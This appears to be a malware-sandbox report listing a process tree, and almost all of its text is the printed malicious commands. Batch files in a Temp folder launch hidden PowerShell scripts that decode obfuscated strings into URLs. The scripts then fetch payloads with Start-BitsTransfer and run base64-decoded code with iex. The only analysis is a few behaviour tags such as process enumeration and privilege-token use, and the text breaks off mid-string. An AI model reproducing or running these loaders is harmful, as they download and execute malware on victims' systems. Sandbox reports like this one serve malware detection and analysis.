C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Gutted;++$Gutted;$Gutted=$Gutted-1;Function Ayegreen ($Organiserende76){$Heterochrony=5;$Heterochrony++;For($Unexceptionableness122=5; $Unexceptionableness122 -lt $Organiserende76.Length-1; $Unexceptionableness122+=$Heterochrony){$Repetitiousness = 'substring';$Disgaveled=$Organiserende76.$Repetitiousness.Invoke($Unexceptionableness122, 1);$Paratomium=$Paratomium+$Disgaveled}$Paratomium;}$Jakkelomme9=Ayegreen 'LessehUd.iktasyndtKurvepRo.ansOpso,:M.lit/ Pern/U,corkPeo,li Cenes DidyaBrddenSk mpb AnseeMonogtIn hehsalgsaSpredk Ka.o.Kotelc Hento,ripemProte/ Ost.KBoced/Fr.psA HumerZi.pic .evetTmreriUndric BibliElamizungode Unde1Sport1Ranci9B.swe.DecidxKu,tot tstopDetal ';$Vidnegodtgrelse=$Jakkelomme9.split([char]62);$Jakkelomme9=$Vidnegodtgrelse[0];$Kandidatfests34=Ayegreen 'Unormi ForbeContaxCin.a ';$spurveungen = Ayegreen ' croq\AfgansSupery FenasBanepwModgaoTepirw,ring6Wh.ck4secul\SnuffW EpheiS.egenbortrdInforo BegrwSebolsExhauPBlegnoYahwewGentieMeatwrRockoSEmitthTilspeListelTe,eplJumbo\HeptavV.nte1.onot.genne0 gel\ ForepUninsoAffinw Sk ie TeksrPi.wisCentrhSmer eKlaptl MendlAssi .Gedebe Skydx ,odee Faki ';.($Kandidatfests34) (Ayegreen 'grain$kundeRsmr.ooTilkaeTilsinstagsdHellie Sukk= Noni$Pe,rleAcclinChabavDurat:GomlawBoligiLeuconDisabd Gan iGenerrskrms ') ;.($Kandidatfests34) (Ayegreen 'Softw$Ind.ns,ecoup M,pguKimblr rummvbak.eeSlaviuFatten By egRerine NeurnE,yth= Impr$DefibR SkiloGaspre.ountnReg,ndWep rePaga,+Scler$E hvesForstp TrinuDerf,rRedfivomganeOverguPo opnpridig.repaeReklan Subo ') ;.($Kandidatfests34) (Ayegreen ' Pa r$mer eM Pla a T,iml RapsaMultirun cci C.nnaN.isepOmarbrbusseoKvindoBeregfSemin1Jabbl8 F.ue subse= ooft Cronu( Set ( Forug ConswAskovmslugviZardm InkliwArbeji Dr.pnUnabi3Lsepr2Suffi_ Ge,npAwardrKummeoTuefoc.eauteFamilsDggels Unhy Infor-EarleFAfmaa DybdePDanskrsagasoPig.bcTilkoeRaglesRenovsNon.xIStd.udTerro=Misun$ Fall{FeathP TilsIDasseDFolia} U.de)Dddru.SvippCpilaso igsamdobbemHefteaJonglnIb.ugdMea,oLSkrueiHovednTrekbeFiefd)Skibs S,egn-SlentsUdda,pMrkbll FairiPa ift Lith ophv[ ForfcBebudhWisela.roker redi]Forbe3Trans4Overf ');.($Kandidatfests34) (Ayegreen 'Biolo$RhizoSSkattuAlquinParetdUndera Flakn Du te RedisC,itteGig a rops= Mali Temp,$ ImpeM.eseraSmirklattacaEnogtrHassei tilbaElskopHjemfrtve,aoFavreoD,taafFabah1Cicat8Perti[Coest$ Red,M lokaaKreeplTnde aPolitrClassi AastaMastepPatterUnorgo Lo.toP.ecif Lou 1 Pulp8 Ufr .AnkepcRituao Dem,uChiegnEud.dtpyth.-Infar2,eume]Crios ');.($Kandidatfests34) (Ayegreen 'Snows$FornuSReifikDissei,eennfAdmontTa.tenAmpliiRnulfnSiameg D ypeSuperr IncosFicus=Kv,pr( FibeT ulfoeDegensMilitt Rea,-TattoPSpontaStodgtDe inhBiogr cean$ ,ynnsVrdi.pDiapauRe,ndrSkattv nonee ErhvuPrecon avilgConfuestiksn F,re)H,pni Bu.le-Vol pAConvenI defdTndem Kontu(Dagp.[PedicIDiskenSgelitE.kliPK nontBesejrTands]Saddu:Uvorn:unressWedgiiCoalmzP ismeVinbj Runds-Gennee Sk lq ,lep Undvi8Knowl)Trop ') ;if ($Skiftningers) {.$spurveungen $Sundanese;} else {;$Pagodens=Ayegreen 'Pal.oS MarmtA,krvaCinderIlle,tstrbe-DisocB Sikli Belut,aandsLoo,fT workr ,toraSelvsnFact.s CyrefGaasee.lagtr Terv ryc- u,psS vestoKatolu ClubrRatiocVestue U ph Ho.e$UntwiJNoncraMinimkNonalkIndereKaurylBlaiso DorsmBrainmR.mineVider9Besud Skald-UranoD,irioePla isPreextRe.eki ynopnForklaFugtstK,lloiTvekno Vin,n okke Ter,s$ Shi RVaaseoResseeBasidnIlanddBorere Fria ';.($Kandidatfests34) (Ayegreen ' Udru$ abbeR.artioYear,e Bulbnhundid BgereErhve=Bl,ck$Sv,keeAab.inP.ldev Pra,:KaramaRispepIn,grp AssudK.kseaAage tProthaBalle ') ;.($Kandidatfests34) (Ayegreen 'PandeI ,animNsectpC.lvaoK spurLysertChado-SubprMManufoPee,edVgteru AkutlStempeSu.er FdselBBohaviRom ntMelles Afl T ProerChacoaSvm,en reasKontrf,emireTallirNonre ') ;$Roende=$Roende+'\Ws.Tro';while (-not $Konomicheferne) {.($Kandidatfests34) (Ayegreen 'T.nna$Expe K Am.soPostenInspeoReinvm.usbaiB nescTiddlh LeaveSpongfSecr,eDistrrIntranSlageeTomas=neste(UnhusTKulmueS ccesPupattBesti-EpiloPGobelaJonahtViv.fh Ex m regnf$GroutRTalefoUndepeSatirn LazadHjem eKomm,)kale. ') ;.($Kandidatfests34) $Pagodens;.($Kandidatfests34) (Ayegreen 'Begi SPreext AnglaVe.barLaelatCanna-N.mphS Oliel CampenonvieSharppSkarp Exter5Langs ');$Jakkelomme9=$Vidnegodtgrelse[$Skamferede++%$Vidnegodtgrelse.count];}.($Kandidatfests34) (Ayegreen '.laxb$LagomlK,tasi Refot Pathh.nymooNonp,pHygroh Benzy raadt sciuoRygeruSo.mesomfor Defun= Vild TankvGFo,breMastutFirea-Dr,ptC Ph.no Aut n AarstThro e apitnDuodetfu,pe Jgers$ HjrnRChaetoDecoceScrapnSublid Coene,orgr ');.($Kandidatfests34) (Ayegreen ' Espr$ ResoU ForpdSejtrfEstimo As orNordsiPrfabnSneg gsongwe.leninMedfasE.egi8 El,k9 M.no Ign.t=Farve Disku[W.gglSStor,y H rbs.adsit.lecieDisemmnone,.SprinC igteoGen.rnKaffevToldkeFors.r aanet Bevi]Tilel:struk:Yuqu.Fu enrr Ambiorejfem.andsBRestoa Kants estreAltsa6Bulbi4For.mSManustLadler,ktivi ,ignnaabengP,ede( Mu d$RenovlRokkei wa.etfemmeh,alisoAlvorp SpekhHj.mbyVir,ctre.leoBortfu Choks Mili)Udled ');.($Kandidatfests34) (Ayegreen 'Sagom$ LaodLSaccheRu.olsNedtos Od foSmuglnTv,ngsO gan Sjatt=Sprin Inter[TitraS Ostey,verisO,erltComp,eSkrmimNomad. Agi.Tprim.eHame.xIde tt arb..U alaEBrnehnVurdecBastooUpfl.d Extei antanN,nacg kage]Wharf: Over:st,beASvbesSSanikCRoy.tILyrerIFugtd.StimeGFdselePerictAfholS.isret StifrStotgi,eddynPo,tigPo.ta(Lun.b$ManifU ForsdBantufRelakoMglerrChloriUnc,nnSondegCoalse ussenIntersStedm8Stee 9Flags) I,at ');.($Kandidatfests34) (Ayegreen ' etr$HerreDIndena aarhh MammlEpideeSvalerSynsruExplapFinla= Unde$ThesmLSyllae Skols FrissTindeoStan noplg.sNavig.N.dsks remeuVildbb ndkrsAlbaetolerar,andtiOpjusnFortvgOlier( Leve3Telli0P nkt7Slgts2Havan2Re le2Forre,Ove v2emi,i5una,s3Su.er6Betal7Tiend)Micro ');.($Kandidatfests34) $Dahlerup;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lnxdcl.bat" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Spdbrnene61;++$Spdbrnene61;$Spdbrnene61=$Spdbrnene61-1;Function Tabelopstninger ($Tjenestemaend15){$Latticinio=5;$Latticinio++;For($Ecotones=5; $Ecotones -lt $Tjenestemaend15.Length-1; $Ecotones+=$Latticinio){$Fritidscenterets = 'substring';$Aktionsdiagrammet=$Tjenestemaend15.$Fritidscenterets.Invoke($Ecotones, 1);$Rgfanerne=$Rgfanerne+$Aktionsdiagrammet}$Rgfanerne;}$Mentalistic=Tabelopstninger ' Betih IndutFi,mftGrsropFis esFric :Deci,/Inten/ Bev wAlmenw,raidwvand..U.dersKinkleglasvnIvedrdProm,ssubnipuni.paC nscc SinteStram.OverscSamploPegebmCrice/ Brilp Phanr PapioRege./ LdredSkdyrlG,ote/Morb,0DownpuInvessStudirNeverr WeignUdlig ';$Biocider=$Mentalistic.split([char]62);$Mentalistic=$Biocider[0];$Egocentrien111=Tabelopstninger 'Ej.doiTat leAswaixRadia ';$Eksamenspapir = Tabelopstninger 'Bonde\BurhnsSep ryhandisBraggwSkrupoe,priwEvaku6Medic4Playd\HerbeW.artfiXiphonJobuddKrseloFo snwpassks,harmP moraoGiocow Ent e UnderDecwrSEfterhUnb,aeSammelHjertl Virk\,nkelv ramo1Unju.. Cl,v0 .eri\ oddpKrukko Lan wFaginer.barrSalatsUd,ogh enh,eRhizol,ommalFjlle.UskadeEuclexBiblieOptag ';.($Egocentrien111) (Tabelopstninger 'Ex en$ hairUSu,stnBent dBem,eeSyntarImperkGgemmlEks ueBohemt Fern=Sag.b$Est eeFor.mn,olkevDigle: .eemw O eri CemenForvrdAc,reite terCrape ') ;.($Egocentrien111) (Tabelopstninger 'U.deb$ MesoEUnintkbraktsNitsfaMerismSildeeHindun ForesEucalpH,ndbaChainpBryl,i.aptirvelfo=Xvips$ IndgUJahvinVitridMotiveUklogrGardek AggrlFo.rseAfsmet Elfr+Seque$GenneEO.senkAnspns Oleaap,ojimAbstre LandnFawn sFluorpBaptiamirakpDarneiForm r Prea ') ;.($Egocentrien111) (Tabelopstninger 'Kaffe$.vejsS Bib,lHundeaEtiolnT,ngld Ordre StokrPluri Des,l=Marci Trfsi(Behan(KlokkgPastowExtremkultuiMtted LepiswArkitiPseudnRude,3 Del.2 U.ny_,kadepAfstdrGas.ioTonsic maiseUsta,s G,lisBe,ts Ligg-Jerr.FKonku HejdiPRa,herGemseoCredicSatureDeadfsreruns omplIAnlgsdEssed=Va,in$Smagf{PunktPS.ribI,arynDRei.c}Desm )Svm.e. AflgCpermio ovedmKontrmUnwomaBowlen pcoidPred LBorteiPa.tinLeglee Nonm) Se i Unm r-Fstnis Pe.rpskat.lTilski R betA.mon B sse[FrakkcFo,mah overa TurrrRep,s]eupot3Stutt4,orvk ');.($Egocentrien111) (Tabelopstninger 'stemm$Undd,ECr tegUdhu,eIncitnEremivSte mi OrgalventijTraffeBol.brSillsnsamfueOpgivsBalan Udmug=P,rit Conce$DisceSClitol tabuaInkaanRein dUnm,leAbatir Spro[In,ae$NontaSUdstolTag,iaObjeknGa ond.ivneetatterSkovk.,roghcTrskroVillau Bo.anTerebtKoek.- unco2Sidel]Chris ');.($Egocentrien111) (Tabelopstninger ' Bed $G,eadSVikarkPe geoSukk vBeefat Udviu Phi r BorteParers Ti g=accom(AcacaTGlorie,ndicsPastot,irig-Call.PDobbeaC.unttToldvh hlox Gr nt$ Par,E S,rykFlagesslo baParanmLigane O,finAkutfsBestap.opskaBudskp.oastiHekserIdola)Storf Tilta-Sa meA UdesnSchizd Dame Anti(Ersta[pupidI TabonBinretTrophPR.kret lgumrnonas] redd: Syge:extrasUndseiDisomz S,ile Brus Feltr-acaudeErhveqB ndi Bore8Buffe)Woods ') ;if ($Skovtures) {.$Eksamenspapir $Egenviljernes;} else {;$Biocycles=Tabelopstninger 'TelevSMurdetBrutta Under.ttaitdispl-Inds BU.beli PredtNdv,ns RefeT Suppr berea ElevnAbluesMoneyfSk,ndeHushjrFlank Luni-AarsoSL steobourbuFi.kerArb jcMissieH.mbu Un er$ TuapM.upereSybarnKri,ttSamlea Skv.l Be viClepisPlejetThyreiTantacnon h subsu-IdeolD I aneArchisaf nstKeratiRen,entotneaAfslrtEtiopiCommeo Fi,enTykka Ly.il$comanU Nyern Oil dDetaieDeodorAnglikFaldslPreapeAfskatPel i ';.($Egocentrien111) (Tabelopstninger ' pira$fleliU glomn O,erdAa sleUnretrNaziskrydnil S.lgeEftertBekra=brand$CalloeBagi nElektvResoj:Unpl.aUnworpBrittpHjemedT.vleaGe,netMandea P.mm ') ;.($Egocentrien111) (Tabelopstninger 'MontcIDesmomG,ganpOpsigoPerf,rCritit Seas-R.comMRudeso Fu,kd E udu Paral Cen.eSkru. AfpluBpresiiFanget hav.soversTSkrifrDi kua Vandn Gu.dsWri.lfGronteDeparr Fald ') ;$Underklet=$Underklet+'\Forsamlingsfrihed.ren';while (-not $Strrelsernes) {.($Egocentrien111) (Tabelopstninger 'Tusin$JazysSMallotMadderPo,ytrEnkefeRaa tl LnkesS,lfieFra,mrskyt nAd,areBuss,sFana =You h(RestiTLgteaeMiljlsHumortSekst-GroovP ,itoabib it,ecouhPolya c.nt$PaafuU qualn GigadMythie AnalrReproktabellBadeve Trret,hlam).nvie ') ;.($Egocentrien111) $Biocycles;.($Egocentrien111) (Tabelopstninger 'NohowSSatintNonexaCloserOutdrtEpisi- DyngSSangtlFa tle Rensehas ipNasob Gre,i5Non n ');$Mentalistic=$Biocider[$Egenvgt++%$Biocider.count];}.($Egocentrien111) (Tabelopstninger 'Bean $ TimeS IllutTh.leyBruddrSkgg iUnstunMaringFortms G adgSinolrAnsteuOverhpBilfapA,poie Mor.rLaplan,tuefeSi atsProte Cysti=Dueli esidGShadseD.skftOut.t-.pstaCDis,aoRefernumbratSwi geTripen remotResu, Pa er$ OrchUPlumbnTrommdHyggee Et.erH.stekAnnell skrmeMonartFejlp ');.($Egocentrien111) (Tabelopstninger 'Hops $KokkeMRigleaJamber ubli KendnRadiae NymatKlasstDrifteLivmo Flen=B,ufr Kamin[ForeaS.cissyNeurosUterotPhil,e Polam unor. S,beCFremmoAflevnUanstv agreSmrebrRoun.tDesa,]Vid r:Spuns:Requ,F PragrBistaoM.scumBalanB ska.aFolkesNonnoeTabul6.harp4 ReblS Pe.gtDeto r F,eriClo cnUlovlgS jal(Coher$DykkeSLumi tdominym.tesr KlubiF.rtjnParagg .atus mrbigAntikrDimenu Prelp OpskpMedvie EnterAppernBou eeScrivsEcsta)Hov,s ');.($Egocentrien111) (Tabelopstninger ' Sg,o$Gu.diNPinieeComecpHylobhKomperFlammi RonddSoldeiReconu Indem Creo Ambes= Spe Swine[StavrS kspeyEtymosAttratIso,teCopybm Ulve.Nio.iTPontie UndoxFejlbtUnrec. NonaERictanDispecNikkioSe lyd ermiiBradynUformgspli ] Pret:Par,d:TinteA,ftosSureteCFusioIki.giIChapm.PerenG AnnuePo,trtLame,S S.bctPdof.rSpilliDelprnPinwhg atam(Stand$JulieMRegimaujvnerPrepuiU.sopn FarieVrts,t LocutB,jdse Lige)Coulo ');.($Egocentrien111) (Tabelopstninger 'Analy$AffejNLa,gioChirosLustutChloraBilbil Orn.gBindiipe blkBrevseAxinarA.kiveCaufanCofou=Vrks $V.gotN Skope Magtp I vahFremsrSamspi hymdsl ugiDialouNa.vnm Betj.ShipmsRamtauRugekbErigis MoultDiararHortoiDr.nen ersogCircu(St de2Ne ma9ddsce3Footm7Pleu,5Rek.u7Cumbe,Progr2Re re6Disfa0Tilba1Matri9P.oto)Decis ');.($Egocentrien111) $Nostalgikeren;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Spdbrnene61;++$Spdbrnene61;$Spdbrnene61=$Spdbrnene61-1;Function Tabelopstninger ($Tjenestemaend15){$Latticinio=5;$Latticinio++;For($Ecotones=5; $Ecotones -lt $Tjenestemaend15.Length-1; $Ecotones+=$Latticinio){$Fritidscenterets = 'substring';$Aktionsdiagrammet=$Tjenestemaend15.$Fritidscenterets.Invoke($Ecotones, 1);$Rgfanerne=$Rgfanerne+$Aktionsdiagrammet}$Rgfanerne;}$Mentalistic=Tabelopstninger ' Betih IndutFi,mftGrsropFis esFric :Deci,/Inten/ Bev wAlmenw,raidwvand..U.dersKinkleglasvnIvedrdProm,ssubnipuni.paC nscc SinteStram.OverscSamploPegebmCrice/ Brilp Phanr PapioRege./ LdredSkdyrlG,ote/Morb,0DownpuInvessStudirNeverr WeignUdlig ';$Biocider=$Mentalistic.split([char]62);$Mentalistic=$Biocider[0];$Egocentrien111=Tabelopstninger 'Ej.doiTat leAswaixRadia ';$Eksamenspapir = Tabelopstninger 'Bonde\BurhnsSep ryhandisBraggwSkrupoe,priwEvaku6Medic4Playd\HerbeW.artfiXiphonJobuddKrseloFo snwpassks,harmP moraoGiocow Ent e UnderDecwrSEfterhUnb,aeSammelHjertl Virk\,nkelv ramo1Unju.. Cl,v0 .eri\ oddpKrukko Lan wFaginer.barrSalatsUd,ogh enh,eRhizol,ommalFjlle.UskadeEuclexBiblieOptag ';.($Egocentrien111) (Tabelopstninger 'Ex en$ hairUSu,stnBent dBem,eeSyntarImperkGgemmlEks ueBohemt Fern=Sag.b$Est eeFor.mn,olkevDigle: .eemw O eri CemenForvrdAc,reite terCrape ') ;.($Egocentrien111) (Tabelopstninger 'U.deb$ MesoEUnintkbraktsNitsfaMerismSildeeHindun ForesEucalpH,ndbaChainpBryl,i.aptirvelfo=Xvips$ IndgUJahvinVitridMotiveUklogrGardek AggrlFo.rseAfsmet Elfr+Seque$GenneEO.senkAnspns Oleaap,ojimAbstre LandnFawn sFluorpBaptiamirakpDarneiForm r Prea ') ;.($Egocentrien111) (Tabelopstninger 'Kaffe$.vejsS Bib,lHundeaEtiolnT,ngld Ordre StokrPluri Des,l=Marci Trfsi(Behan(KlokkgPastowExtremkultuiMtted LepiswArkitiPseudnRude,3 Del.2 U.ny_,kadepAfstdrGas.ioTonsic maiseUsta,s G,lisBe,ts Ligg-Jerr.FKonku HejdiPRa,herGemseoCredicSatureDeadfsreruns omplIAnlgsdEssed=Va,in$Smagf{PunktPS.ribI,arynDRei.c}Desm )Svm.e. AflgCpermio ovedmKontrmUnwomaBowlen pcoidPred LBorteiPa.tinLeglee Nonm) Se i Unm r-Fstnis Pe.rpskat.lTilski R betA.mon B sse[FrakkcFo,mah overa TurrrRep,s]eupot3Stutt4,orvk ');.($Egocentrien111) (Tabelopstninger 'stemm$Undd,ECr tegUdhu,eIncitnEremivSte mi OrgalventijTraffeBol.brSillsnsamfueOpgivsBalan Udmug=P,rit Conce$DisceSClitol tabuaInkaanRein dUnm,leAbatir Spro[In,ae$NontaSUdstolTag,iaObjeknGa ond.ivneetatterSkovk.,roghcTrskroVillau Bo.anTerebtKoek.- unco2Sidel]Chris ');.($Egocentrien111) (Tabelopstninger ' Bed $G,eadSVikarkPe geoSukk vBeefat Udviu Phi r BorteParers Ti g=accom(AcacaTGlorie,ndicsPastot,irig-Call.PDobbeaC.unttToldvh hlox Gr nt$ Par,E S,rykFlagesslo baParanmLigane O,finAkutfsBestap.opskaBudskp.oastiHekserIdola)Storf Tilta-Sa meA UdesnSchizd Dame Anti(Ersta[pupidI TabonBinretTrophPR.kret lgumrnonas] redd: Syge:extrasUndseiDisomz S,ile Brus Feltr-acaudeErhveqB ndi Bore8Buffe)Woods ') ;if ($Skovtures) {.$Eksamenspapir $Egenviljernes;} else {;$Biocycles=Tabelopstninger 'TelevSMurdetBrutta Under.ttaitdispl-Inds BU.beli PredtNdv,ns RefeT Suppr berea ElevnAbluesMoneyfSk,ndeHushjrFlank Luni-AarsoSL steobourbuFi.kerArb jcMissieH.mbu Un er$ TuapM.upereSybarnKri,ttSamlea Skv.l Be viClepisPlejetThyreiTantacnon h subsu-IdeolD I aneArchisaf nstKeratiRen,entotneaAfslrtEtiopiCommeo Fi,enTykka Ly.il$comanU Nyern Oil dDetaieDeodorAnglikFaldslPreapeAfskatPel i ';.($Egocentrien111) (Tabelopstninger ' pira$fleliU glomn O,erdAa sleUnretrNaziskrydnil S.lgeEftertBekra=brand$CalloeBagi nElektvResoj:Unpl.aUnworpBrittpHjemedT.vleaGe,netMandea P.mm ') ;.($Egocentrien111) (Tabelopstninger 'MontcIDesmomG,ganpOpsigoPerf,rCritit Seas-R.comMRudeso Fu,kd E udu Paral Cen.eSkru. AfpluBpresiiFanget hav.soversTSkrifrDi kua Vandn Gu.dsWri.lfGronteDeparr Fald ') ;$Underklet=$Underklet+'\Forsamlingsfrihed.ren';while (-not $Strrelsernes) {.($Egocentrien111) (Tabelopstninger 'Tusin$JazysSMallotMadderPo,ytrEnkefeRaa tl LnkesS,lfieFra,mrskyt nAd,areBuss,sFana =You h(RestiTLgteaeMiljlsHumortSekst-GroovP ,itoabib it,ecouhPolya c.nt$PaafuU qualn GigadMythie AnalrReproktabellBadeve Trret,hlam).nvie ') ;.($Egocentrien111) $Biocycles;.($Egocentrien111) (Tabelopstninger 'NohowSSatintNonexaCloserOutdrtEpisi- DyngSSangtlFa tle Rensehas ipNasob Gre,i5Non n ');$Mentalistic=$Biocider[$Egenvgt++%$Biocider.count];}.($Egocentrien111) (Tabelopstninger 'Bean $ TimeS IllutTh.leyBruddrSkgg iUnstunMaringFortms G adgSinolrAnsteuOverhpBilfapA,poie Mor.rLaplan,tuefeSi atsProte Cysti=Dueli esidGShadseD.skftOut.t-.pstaCDis,aoRefernumbratSwi geTripen remotResu, Pa er$ OrchUPlumbnTrommdHyggee Et.erH.stekAnnell skrmeMonartFejlp ');.($Egocentrien111) (Tabelopstninger 'Hops $KokkeMRigleaJamber ubli KendnRadiae NymatKlasstDrifteLivmo Flen=B,ufr Kamin[ForeaS.cissyNeurosUterotPhil,e Polam unor. S,beCFremmoAflevnUanstv agreSmrebrRoun.tDesa,]Vid r:Spuns:Requ,F PragrBistaoM.scumBalanB ska.aFolkesNonnoeTabul6.harp4 ReblS Pe.gtDeto r F,eriClo cnUlovlgS jal(Coher$DykkeSLumi tdominym.tesr KlubiF.rtjnParagg .atus mrbigAntikrDimenu Prelp OpskpMedvie EnterAppernBou eeScrivsEcsta)Hov,s ');.($Egocentrien111) (Tabelopstninger ' Sg,o$Gu.diNPinieeComecpHylobhKomperFlammi RonddSoldeiReconu Indem Creo Ambes= Spe Swine[StavrS kspeyEtymosAttratIso,teCopybm Ulve.Nio.iTPontie UndoxFejlbtUnrec. NonaERictanDispecNikkioSe lyd ermiiBradynUformgspli ] Pret:Par,d:TinteA,ftosSureteCFusioIki.giIChapm.PerenG AnnuePo,trtLame,S S.bctPdof.rSpilliDelprnPinwhg atam(Stand$JulieMRegimaujvnerPrepuiU.sopn FarieVrts,t LocutB,jdse Lige)Coulo ');.($Egocentrien111) (Tabelopstninger 'Analy$AffejNLa,gioChirosLustutChloraBilbil Orn.gBindiipe blkBrevseAxinarA.kiveCaufanCofou=Vrks $V.gotN Skope Magtp I vahFremsrSamspi hymdsl ugiDialouNa.vnm Betj.ShipmsRamtauRugekbErigis MoultDiararHortoiDr.nen ersogCircu(St de2Ne ma9ddsce3Footm7Pleu,5Rek.u7Cumbe,Progr2Re re6Disfa0Tilba1Matri9P.oto)Decis ');.($Egocentrien111) $Nostalgikeren;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqfwfs.cmd" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Tareret;++$Tareret;$Tareret=$Tareret-1;Function focalizations ($Lader){$Regularizes=5;$Regularizes++;For($Faldskrmssoldaten=5; $Faldskrmssoldaten -lt $Lader.Length-1; $Faldskrmssoldaten+=$Regularizes){$Erotogenetic = 'substring';$Aristolochiaceous=$Lader.$Erotogenetic.Invoke($Faldskrmssoldaten, 1);$Bulbose=$Bulbose+$Aristolochiaceous}$Bulbose;}$Skriftbilledet=focalizations 'Ametrh HjlatBrudttShopkpBad,msCela,:Overs/Sur.a/ da bwFina.wSpisew Fi t.sl ngsHydraeMedianElektd,iljus Dr,fp hypea lmanc VerbeOinks.DaghecR,ninoEntocmReakt/FordapacheirRep,eo syl/SavnidRaa glNonp,/Skri,vMyeli9P adrtO.fenzLak,roDemic8 Ordb ';$Planlgningslove=$Skriftbilledet.split([char]62);$Skriftbilledet=$Planlgningslove[0];$Regnvandsbrnds=focalizations 'EvacuiAb ore BeskxKemot ';$Afdramatiseringen = focalizations ' Hobb\ FlgesMerkoyGelnds MilrwNissoo.enefwJaghi6Un.er4habil\LadniW MineiSw wnnBendadVeklaoB malwHildesAmbe,PShlepoSnakkw PanneMetaprForseSS ksahAcutoeSo iclHustelStub,\Ravn vBesl 1Decor.Paras0Algiv\Tailop Doero OphowJuriseTradirIngens Te,eh OvereAdvowl,elpflBifag.I,dpleSynb x LugeeBrugt ';.($Regnvandsbrnds) (focalizations 'platt$TotalHPaleoaRyolfceksdikCopr,sC.ntut .dioaRadicfStvnefMarti= Cass$Ja ane,ispenChil vpar n:HmorrwConceiScantn erskdBe,reiAfklar Floo ') ;.($Regnvandsbrnds) (focalizations ' Subb$KalveA FornflavaldRenegrSubnoaDetaimHaardaConfitLaughiFgtnisHaandeVgtfyrMaa.eiTjenenAcropgS.raae ndinBifag=Pladr$FilmaH Is waMiddecKlippk,elecs ForstpoeciaBrttefHeftefTabif+Warty$InvenA,lenufVindsdWinn rForsia Slutm stroaGlidetB trkiDis,es E.egeGelatr ,odbiuimodn UnlugSoulheFlu,tnEpi,e ') ;.($Regnvandsbrnds) (focalizations 'uniku$P,ematFrowsrLup,maDo kls Pa lkTr cheLongw Over=De,ra .eepe(agros(OversgPraktwS,ttemKrykkiAmboi FrigfwSnopeiOil,in Ove.3 E.it2Ideoo_HoejlpA kasrFolkeo,eighc Homoe Spros.nkonsBacks be,ta-OvernF,acry BournPAgglorKlaptoskabecRedkne Jak,s p.rasFragmIJyde,dStand= Pala$Arryp{ Tnk,PGenocIfusioD Smre}S,ast)Rv gr.NedvrC Byg,ovrtplmDilatm onasaReflen Dia dDeforLSpartiSybarnSha peOvera)Honnr Regia-.nsttsKartopL,spalK lkbiSennetZygoz Mariu[PeiseceugenhSidseaFu.tsrVandu]Kursu3Disen4Forfa ');.($Regnvandsbrnds) (focalizations 'Monst$Afs rsucayavPrelii AbjunLdrepg CajaePerinlTr,ru rkla=Degly Posen$LustftRangerPer.pa camis,ostek BetneEukar[Kurva$ DoortsandsrLnrelaEi essYoghuk Rense .nam.OctoscOptimoAdj,cuNymphnWin,strese,- Viel2Nondi]B vrt ');.($Regnvandsbrnds) (focalizations 'Bolig$H,vedeBete,t Tvi mKr opa Blu.aOverslhypogsGammepNeroieSocianWi sogAttraeT.appn.kanne Effl=Nonli( InacT e,ipeLaskesT ggetBu,ti-ForriPHvidoaNon vt OverhDeka. Kont.$SphygASkndsfSypigdInterrEucaraParalm By,aaAadset K.asiSubocsS rmse,inanr hauli ObstnGadetgBytteeTybalnAndro)Ci tr Sesa- StenASkallnC.pesdBu.an Alsok(Chrom[ PyraIAfkognmtaaltRhodaP Pakvt Tonir Musi]K.til:Straa: od ns DeltiBree,zMon,se A.in Tabel-StruneL.ssiq Furi Vide8Snouc)Srsyn ') ;if ($etmaalspengene) {.$Afdramatiseringen $svingel;} else {;$Forbreddes=focalizations ' AarsSEligetDepara bjerOmgantYokel-ProduB MiliiKastet,ostasFeuchTSquarrBilivaRgfornEventsPeskyfDetaceNonrer.enoc Fo.et-Hin.eS Vs,loStockuStilrrUagtscA.lsdeFo.si Eksis$Sna,sSG.ttekStu,tr Fremi,ymmefhai.atDep,eb Fr ti RatilVar.glShahzeUnde.dS,rmfeRaajotSoma, fervi- SmokD.ekokePointsPropotSchoeiBulnin MiniaBet dtPressiAfsvaoHollon A,in Sph,r$Ta loHSereraLeisucUnneukBachesL,nget UtopaProbofAnterfMetre ';.($Regnvandsbrnds) (focalizations ' .rdn$FalsiHCavoraHyp,gcNeedekFarvesAntagtTotalaCacodfAntipfAffal=Rrhne$ DegueBandsn C lpvGodse:ForsyaSim.lpKretipSt,und OutwaArybatdeed.aTakh. ') ;.($Regnvandsbrnds) (focalizations 'FipskIPhob.mLn itpHnseaoPathorFinant Se.i-AadseMPhilooMichodpap ru.imeolPe,lieAfn.k VldiBNo.kwiCalvit L nvsNordbTKl.ssrAfgivaAdjutnB,gynsCytotf OxygeRaadsr etow ') ;$Hackstaff=$Hackstaff+'\sundhedsfares.Erd';while (-not $Sunup213) {.($Regnvandsbrnds) (focalizations ',esti$Ty.isS FixbuParaln.syncuEneucp .ejl2 Hulk1Retr.3,usse=Taxi (CochlTsvimeeOs.ansFlyt tSeacr-ForinPArchca Orgatp.eilhH tte Ankla$ArbitHInteraAndencKumulk agissUns itGlitta Opf,fAfbryfSeq.s)Luxur ') ;.($Regnvandsbrnds) $Forbreddes;.($Regnvandsbrnds) (focalizations 'Ube,aS PrgttGudesa .tofrUndert Bort-divanSHypotlSp.keeP oczePe,iapTelef emf5Tosse ');$Skriftbilledet=$Planlgningslove[$Boppers++%$Planlgningslove.count];}.($Regnvandsbrnds) (focalizations 'Grupp$Ejef IPinckrFor rr .mbrequoadsMic.oi Gr ilDadleiSkovpe BrnenHa dbc Toxae Priv F.rm=Ek,is OmtviGPotene Luret Touz-,rugtCFotogo .efanAntict,aadee.eticnLettetOryct Fruit$,onopH Th.ba UnlucFontnkNyttesq,adrtTlapaa BlowfS,ovpfVaabe 